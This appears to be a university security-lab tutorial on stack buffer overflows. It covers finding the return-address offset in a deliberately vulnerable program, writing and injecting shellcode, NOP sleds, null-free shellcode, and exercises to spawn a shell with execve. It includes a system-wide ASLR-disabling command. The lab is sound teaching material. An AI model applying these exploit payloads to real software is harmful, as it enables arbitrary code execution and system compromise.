Once an attacker manages to overwrite the return address, the usual next step is to divert the execution flow to their advantage. A stable foothold inside the exploited system can be gained by spawning a shell from the vulnerable application.
This can be accomplished by injecting code into the application's memory (stack, heap or by other means) and diverting the execution flow to that code. Please note the following prerequisites in order for this to work:
Since the injected code's outcome is commonly that of spawning a shell, the name “shellcode” is used to describe a wide array of such code snippets. A “shellcode” could also create a new socket, or read the contents of a file and print it to the standard output.
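One prerequisite is that ASLR is disabled, so that stack addresses stay the same from one run to the next. To disable it, run:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space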
Note that this has a system-wide effect. To launch a single executable with ASLR disabled, use:
setarch $(uname -m) -R <executable>
(You can pass a shell as the executable and all processes launched by that shell will also have ASLR disabled.)
You can also use Ghidra or IDA to analyze the binaries and the disassembled code. You can read more about using IDA here.
For this tutorial, our goal is to write, inject and use a simple shellcode. In the following steps, we will analyze a simple program, test payloads, assess the vulnerability, then create a shellcode and exploit the program. We will use a very simple shellcode, one that does:
exit(42);
We have the following blatantly vulnerable program:
extern gets
extern printf

section .data
formatstr: db "Enjoy your leak: %p",0xa,0

section .text
global main
main:
    push rbp
    mov rbp, rsp
    sub rsp, 64
    lea rbx, [rbp - 64]
    mov rsi, rbx
    mov rdi, formatstr
    call printf
    mov rdi, rbx
    call gets
    leave
    ret
You may already see what the vulnerability consists of.
We are going to use some of PEDA's features to our advantage:
gdb-peda$ pattc 100 # Generate a De Bruijn pattern of length 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r <<< 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Starting program: vuln 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Here is your leek: 0x7fffffffdc30
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffdc90 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RBX: 0x7fffffffdc90 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RCX: 0x7ffff7dcfa00 --> 0xfbad2088
RDX: 0x7ffff7dd18d0 --> 0x0
RSI: 0x602671 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
RDI: 0x7fffffffdc91 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RBP: 0x4141334141644141 ('AAdAA3AA')
RSP: 0x7fffffffdcd8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RIP: 0x400567 (<main+39>: ret)
R8 : 0x6026d5 --> 0x0
R9 : 0x0
R10: 0x602010 --> 0x0
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffddb0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400567 in main ()
gdb-peda$ patto AAdAA3AA
AAdAA3AA found at offset: 64
Notice that the program crashed on the ret instruction. The 8 bytes at the top of the stack (RSP), “IAAeAA4A”, were about to be used as the return address; they do not form a valid address, which triggered the fault. RBP holds 0x4141334141644141, which corresponds to the unique quad group “AAdAA3AA” found at offset 64 in the pattern. This offset is where the old RBP is situated relative to our input; the saved return address follows it, 8 bytes later, at offset 72.
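The offsets can also be derived from the prologue of main rather than from the pattern. The following is a minimal sketch of that arithmetic; the constant names are illustrative and not part of the lab files.

```python
# Frame layout of main, derived from its prologue:
#   push rbp; mov rbp, rsp; sub rsp, 64; lea rbx, [rbp - 64]
BUFFER_SIZE = 64  # bytes reserved by `sub rsp, 64`; the buffer starts at rbp - 64
WORD_SIZE = 8     # size of a saved register on x86-64

# The saved RBP sits right above the buffer, the return address right above that.
saved_rbp_offset = BUFFER_SIZE
return_addr_offset = saved_rbp_offset + WORD_SIZE

print(f"saved RBP offset:      {saved_rbp_offset}")
print(f"return address offset: {return_addr_offset}")
```

The first value agrees with the offset reported by patto for the contents of RBP.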
Now that we know the return address sits at offset 72 from the beginning of the buffer (which is also the beginning of our input), we can attempt to reliably crash the program at a destination of our choice. Let's try having 'BBBBBB' as our return address, or 0x0000424242424242, preceded by 72 'A's.
We can construct this test sequence using python from the command line:
python -c "print('A'*72 + 'BBBBBB')"
We can now rerun the binary under gdb and see what happens.
gdb-peda$ r <<< `python -c "print('A'*72 + 'BBBBBB')"`
Starting program: /home/stefania/cns-labs-2018/lab-06/skel/vuln <<< `python -c "print('A'*72 + 'BBBBBB')"`
Enjoy your leak: 0x7fffffffdc90
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB")
RBX: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB")
RCX: 0x7ffff7dcfa00 --> 0xfbad2088
RDX: 0x7ffff7dd18d0 --> 0x0
RSI: 0x602671 ('A' <repeats 71 times>, "BBBBBB\n")
RDI: 0x7fffffffdc91 ('A' <repeats 71 times>, "BBBBBB")
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffdce0 --> 0x1
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x6026bf --> 0x0
R9 : 0x0
R10: 0x602010 --> 0x0
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffddb0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdce0 --> 0x1
0008| 0x7fffffffdce8 --> 0x7fffffffddb8 --> 0x7fffffffe15f ("/home/stefania/cns-labs-2018/lab-06/skel/vuln")
0016| 0x7fffffffdcf0 --> 0x100008000
0024| 0x7fffffffdcf8 --> 0x400540 (<main>: push rbp)
0032| 0x7fffffffdd00 --> 0x0
0040| 0x7fffffffdd08 --> 0x8efa2a609ebbe932
0048| 0x7fffffffdd10 --> 0x400450 (<_start>: xor ebp,ebp)
0056| 0x7fffffffdd18 --> 0x7fffffffddb0 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()
Excellent!
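The value that ended up in RIP can be double-checked with a short Python sketch. It assumes that gets wrote its terminating NUL into the seventh byte and that the eighth byte of the original return address was already zero; neither is shown directly in the log, but both are consistent with it.

```python
overwritten = b"BBBBBB"  # the six bytes we placed over the return address
terminator = b"\x00"     # NUL byte appended by gets after our input
untouched = b"\x00"      # assumed: top byte of the original return address

raw = overwritten + terminator + untouched
rip = int.from_bytes(raw, "little")  # x86-64 stores integers in little-endian order
print(hex(rip))
```

This is why six 'B' characters are enough to control the full 64-bit return address here.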
Shellcode is typically written in assembly, due to memory constraints.
How do we start writing our exit shellcode? First, we need to know how system calls are performed on our target platform (Linux on x86-64 in our case).
Each system call has a specific number which identifies it. This number must be stored in RAX. Next, the arguments of the system call are placed in RDI, RSI, RDX, R10, R8, R9, in this order. A dedicated instruction, syscall, is used to issue the actual system call.
Consult the Linux x64 ABI here
We need to place 60 (exit's system call number) in RAX, and the value of exit's single argument in RDI.
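As a rough illustration of this convention, the Python sketch below maps a system call and its arguments to the registers that have to be loaded before syscall executes. The helper name and the small table of syscall numbers are illustrative; only write, execve and exit are listed.

```python
# Argument registers for the Linux x86-64 `syscall` instruction, in order.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")

# A few system call numbers from the x86-64 table.
SYSCALL_NUMBERS = {"write": 1, "execve": 59, "exit": 60}

def syscall_registers(name, *args):
    """Return the register values needed before executing `syscall`."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("a system call takes at most six arguments")
    regs = {"rax": SYSCALL_NUMBERS[name]}
    # Pair each argument with its register, in calling-convention order.
    regs.update(zip(ARG_REGISTERS, args))
    return regs

print(syscall_registers("exit", 42))
```

For exit(42) this yields RAX = 60 and RDI = 42, which is exactly what the shellcode has to set up.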
Our shellcode will look as follows:
BITS 64
mov rdi, 42
mov rax, 60
syscall
But we can't pass it as assembly instructions to the application; we need to assemble it into binary as well.
nasm shellcode_exit.S -o shell.bin
We now need this binary code as a stream of hex values in order to use python/perl/echo to feed it into the application.
hexdump -v -e '1/1 "\\"' -e '1/1 "x%02x"' shell.bin ; echo
or
xxd -c 1 -p shell.bin | awk '{ print "\\x" $0 }' | paste -sd ""
or just use the conveniently supplied bin_to_hex.sh script.
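If neither hexdump nor xxd is at hand, the same conversion is a few lines of Python. This is a sketch of an equivalent, not the contents of bin_to_hex.sh; the function names are illustrative.

```python
def to_hex_escapes(data: bytes) -> str:
    """Format raw bytes as backslash-x hex escapes, one per byte."""
    return "".join(f"\\x{byte:02x}" for byte in data)

def file_to_hex_escapes(path: str) -> str:
    """Read a binary file (e.g. shell.bin) and return its hex-escaped form."""
    with open(path, "rb") as f:
        return to_hex_escapes(f.read())

# The two bytes of the `syscall` instruction, as an example.
print(to_hex_escapes(b"\x0f\x05"))
```

Calling file_to_hex_escapes("shell.bin") should produce the same kind of string as the pipelines above.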
In order to test your shellcode, you can use xxd to export the shellcode as a C array and test it using the test_shellcode program in the archive.
xxd -i shell.bin > shellcode
By running test_shellcode under strace, you can check whether the system call was actually performed, and with which arguments. If all else fails, use gdb.
strace -e exit ./test_shellcode
exit(42) = ?
+++ exited with 42 +++
Use the supplied bin_to_hex.sh script to convert a binary file to a hex representation. First, let's determine the length of our shellcode:
wc -c shell.bin
12 shell.bin
Next, we need to pad the shellcode up to 72 bytes, so that whatever follows lands on the saved return address on the stack.
python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12))"
Now we need to find the beginning of our buffer on the stack in order to return to it. Repeat the experiment and set a breakpoint at the leave instruction. Write down the address of the beginning of your buffer on the stack, because that is where the shellcode will end up.
gdb-peda$ b *0x0000000000400566
Breakpoint 2 at 0x400566
gdb-peda$ r <<< `python -c "print ('A'*72 + 'BBBBBB')"`
Starting program: /home/stefania/cns-labs-2018/lab-06/skel/vuln <<< `python -c "print ('A'*72 + 'BBBBBB')"`
Enjoy your leak: 0x7fffffffdc90
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB")
RBX: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB")
RCX: 0x7ffff7dcfa00 --> 0xfbad2088
RDX: 0x7ffff7dd18d0 --> 0x0
RSI: 0x602671 ('A' <repeats 71 times>, "BBBBBB\n")
RDI: 0x7fffffffdc91 ('A' <repeats 71 times>, "BBBBBB")
RBP: 0x7fffffffdcd0 ("AAAAAAAABBBBBB")
RSP: 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB")
RIP: 0x400566 (<main+38>: leave)
R8 : 0x6026bf --> 0x0
R9 : 0x0
R10: 0x602010 --> 0x0
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffddb0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400559 <main+25>: call 0x400430 <printf@plt>
   0x40055e <main+30>: mov rdi,rbx
   0x400561 <main+33>: call 0x400440 <gets@plt>
=> 0x400566 <main+38>: leave
   0x400567 <main+39>: ret
   0x400568 <main+40>: nop DWORD PTR [rax+rax*1+0x0]
   0x400570 <__libc_csu_init>: push r15
   0x400572 <__libc_csu_init+2>: push r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdc90 ('A' <repeats 72 times>, "BBBBBB")
0008| 0x7fffffffdc98 ('A' <repeats 64 times>, "BBBBBB")
0016| 0x7fffffffdca0 ('A' <repeats 56 times>, "BBBBBB")
0024| 0x7fffffffdca8 ('A' <repeats 48 times>, "BBBBBB")
0032| 0x7fffffffdcb0 ('A' <repeats 40 times>, "BBBBBB")
0040| 0x7fffffffdcb8 ('A' <repeats 32 times>, "BBBBBB")
0048| 0x7fffffffdcc0 ('A' <repeats 24 times>, "BBBBBB")
0056| 0x7fffffffdcc8 ('A' <repeats 16 times>, "BBBBBB")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0000000000400566 in main ()
The buffer starts at 0x7fffffffdc90, so we append that address, in little-endian byte order, as the new return address:
python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12) + b'\x90\xdc\xff\xff\xff\x7f')" > payload
gdb-peda$ r < payload
Starting program: vuln < payload
Enjoy your leak: 0x7fffffffdc90
[Inferior 1 (process 11615) exited with code 052]
Warning: not running or target is remote
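The same payload can be assembled in a small Python script, which is easier to adjust than a one-liner. The sketch below is an illustration under assumptions: the shellcode bytes are a hand-written 12-byte encoding of mov edi, 42; mov eax, 60; syscall (the file produced by nasm may differ), and build_payload is a hypothetical helper, not part of the lab archive.

```python
import struct

OFFSET = 72  # distance from the start of the buffer to the saved return address

def build_payload(shellcode: bytes, buffer_addr: int, offset: int = OFFSET) -> bytes:
    """Shellcode, then filler up to `offset`, then the new return address."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    padding = b"A" * (offset - len(shellcode))
    # "<Q" packs an unsigned 64-bit integer in little-endian byte order.
    payload = shellcode + padding + struct.pack("<Q", buffer_addr)
    if b"\n" in payload:
        # gets stops reading at a newline, which would truncate the payload.
        raise ValueError("payload contains a newline byte")
    return payload

# Assumed encoding of the exit(42) shellcode: mov edi, 42; mov eax, 60; syscall
SHELLCODE = bytes.fromhex("bf2a000000" "b83c000000" "0f05")
payload = build_payload(SHELLCODE, 0x7FFFFFFFDC90)
print(len(payload))
```

Unlike the one-liner, this writes all 8 bytes of the address; since gets does not stop at NUL bytes, both forms should behave the same for this binary. Writing the result with open("payload", "wb") gives a file that can be fed to the program.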
Now test the payload in gdb! Break at ret and watch the control flow continue on the stack and execute exit. Note that gdb reports the exit code in octal: 052 is 42.
Then try running the experiment outside of gdb. Does it still work? Why or why not?
To spare you some frustration, the binary itself leaks the stack address of the buffer: this is the value it prints at startup.
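An exploit script can pick the address up from that output instead of hard-coding it. The following sketch only covers the parsing step and assumes the leak line has the form shown in the earlier runs; parse_leak is an illustrative name.

```python
import re

# Matches the first hexadecimal literal on a line, e.g. 0x7fffffffdc90.
LEAK_PATTERN = re.compile(r"0x[0-9a-fA-F]+")

def parse_leak(line: str) -> int:
    """Extract the first hexadecimal address from a line of program output."""
    match = LEAK_PATTERN.search(line)
    if match is None:
        raise ValueError(f"no address found in {line!r}")
    return int(match.group(0), 16)

buffer_addr = parse_leak("Enjoy your leak: 0x7fffffffdc90")
print(hex(buffer_addr))
```

The resulting integer is the value to place over the saved return address.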
Sometimes you won't have access to the binary and will only have a leaked address of some description. In that case, you can add this instruction to your shellcode
jmp 0x0
and vary the overwritten return address. If the program hangs instead of crashing, execution has reached your shellcode.
Stack addresses aren't always stable. To circumvent this, buffer space permitting, you can inject a large number of 'nop' (no operation) instructions before the actual shellcode. This way, if you return to any of the injected nop instructions, the execution flow will slide forward until it reaches your shellcode.
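A NOP sled for the vulnerable program above could be laid out as in the following Python sketch. It is an illustration under assumptions: the shellcode bytes are a hand-written encoding of exit(42), the 72-byte offset is the one found earlier, and both helper names are hypothetical.

```python
import struct

NOP = b"\x90"  # single-byte x86 `nop` instruction
OFFSET = 72    # distance from the start of the buffer to the saved return address

def build_sled_payload(shellcode: bytes, guessed_addr: int, offset: int = OFFSET) -> bytes:
    """Fill the space before the return address with NOPs followed by the shellcode."""
    sled_len = offset - len(shellcode)
    if sled_len < 0:
        raise ValueError("shellcode does not fit before the return address")
    return NOP * sled_len + shellcode + struct.pack("<Q", guessed_addr)

def landing_range(buffer_addr: int, sled_len: int) -> range:
    """Return addresses that work: any sled byte, or the first shellcode byte."""
    return range(buffer_addr, buffer_addr + sled_len + 1)

# Assumed encoding of the exit(42) shellcode: mov edi, 42; mov eax, 60; syscall
SHELLCODE = bytes.fromhex("bf2a000000" "b83c000000" "0f05")
BUFFER_ADDR = 0x7FFFFFFFDC90

# Aim for the middle of the sled to tolerate shifts in either direction.
payload = build_sled_payload(SHELLCODE, BUFFER_ADDR + 30)
print(len(landing_range(BUFFER_ADDR, OFFSET - len(SHELLCODE))))
```

With a 12-byte shellcode, the 60-byte sled lets 61 different return addresses succeed instead of exactly one.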
Your exploit may spawn a shell that exits immediately. That's because the shell inherits the program's stdin, which reaches end-of-file as soon as the payload has been consumed. A workaround is to keep stdin open after the payload, as follows:
$ cat payload - | ./vuln
If your process is not cat but something else (like python), you can place it in a subshell, chained with a no-args cat (whose behavior is simply to replicate stdin to stdout):
$ (python -c "print('something')" && cat) | ./vuln
In this way, after the shell spawns, you can interact with it.
All content necessary for the CNS laboratory tasks can be found in the CNS public repository.
Using the same vulnerable binary, write a shellcode which performs the following:
write(1, "Hello World!\n", 13);
Again, inspect the Linux x64 ABI.
BITS 64
    jmp string
start:
    pop rsi     ; pop address of `hello` variable in rsi (the 2nd syscall argument on 64 bits)
    [...]
    syscall     ; do syscall on 64 bits
string:
    call start  ; jump/trampoline back to start while storing the address of `hello` on the stack
hello: db "Hello World!", 0xa, 0
The call instruction will push the address of the next “instruction” (in this case, our string) onto the stack.
Now for the real challenge, write a shellcode which actually spawns a shell. The equivalent C call is the following:
execve("/bin/sh", ["/bin/sh", NULL], NULL);
Where ["/bin/sh", NULL] denotes the address of an array of two pointers: the address of the "/bin/sh" string, followed by NULL.
You will need the address of the "/bin/sh" string on the stack. You can do this using the hack from the write challenge.
Inspect the code of vuln2.asm. What changed? How is your input passed?
Some functions, such as strcpy, sprintf and strcat stop whenever a NULL byte is reached. If you inspect your previous shellcodes using xxd, you will notice that they have plenty of NULL ('0x00') bytes in them, so your lifelong dream for world domination will be cut short whenever these functions are used.
However, there's more than one way to write assembly. Convert your previous shellcode into one that contains no NULLs and use it to exploit vuln2.
mov <reg>, 0      <->  xor <reg>, <reg>
mov <reg>, value  <->  push value, pop <reg>
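A quick way to check a candidate shellcode for forbidden bytes is a few lines of Python. The sketch below uses two hand-encoded versions of the exit(42) shellcode as sample data; these byte strings are assumptions written out by hand, not the output of the lab's build, and find_bad_bytes is an illustrative helper.

```python
def find_bad_bytes(shellcode: bytes, bad: bytes = b"\x00") -> list:
    """Return the offsets of every byte in `shellcode` that appears in `bad`."""
    return [i for i, byte in enumerate(shellcode) if byte in bad]

# mov edi, 42; mov eax, 60; syscall
WITH_NULLS = bytes.fromhex("bf2a000000" "b83c000000" "0f05")
# push 42; pop rdi; push 60; pop rax; syscall
WITHOUT_NULLS = bytes.fromhex("6a2a5f" "6a3c58" "0f05")

print(find_bad_bytes(WITH_NULLS))
print(find_bad_bytes(WITHOUT_NULLS))
```

The bad parameter can be extended with other bytes the target function treats specially, for example b"\x00\n" when the input also passes through gets.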
Lastly, let's use pwntools to do most of the work for us and exploit vuln once more. Fill in the values in skel_pwn.py and run the script.